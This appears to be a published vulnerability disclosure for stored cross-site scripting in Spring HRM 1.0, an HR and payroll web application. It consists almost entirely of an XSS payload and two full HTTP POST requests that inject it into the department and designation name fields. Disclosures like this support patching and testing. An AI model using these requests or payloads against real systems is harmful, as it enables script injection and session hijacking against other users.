# Exploit Title: Spring HRM - HRM & Payroll / Cross-site Scripting
# Date: 18/01/2022
# Exploit Author: Esra Nur SAYIM
# Vendor Homepage: https://www.springsoftit.com/
# Software Link: https://codecanyon.net/item/spring-hrm-hrm-payroll/35416929
# Version: 1.0
# Tested on: Windows 10 Enterprise 21H2, Ubuntu WSL 20
Vulnerability: https://{{DOMAIN}}/admin/add-department
Payload: "><img src=x onerror=alert('XSS')>
HTTP Request:
POST /admin/add-department HTTP/2
Host: {{HOST}}
Cookie: {{COOKIES}}
Content-Length: 56
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: {{HOST}}
Referer: {{HOST}}/admin/addDepartment
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
dept_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E
--------------------
Vulnerability: https://{{DOMAIN}}/admin/add-designation
Payload: "><img src=x onerror=alert('XSS')>
HTTP Request:
POST /admin/add-designation HTTP/2
Host: {{HOST}}
Cookie: {{COOKIES}}
Content-Length: 63
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: {{HOST}}
Referer: {{HOST}}/admin/addDepartment
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
designation_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E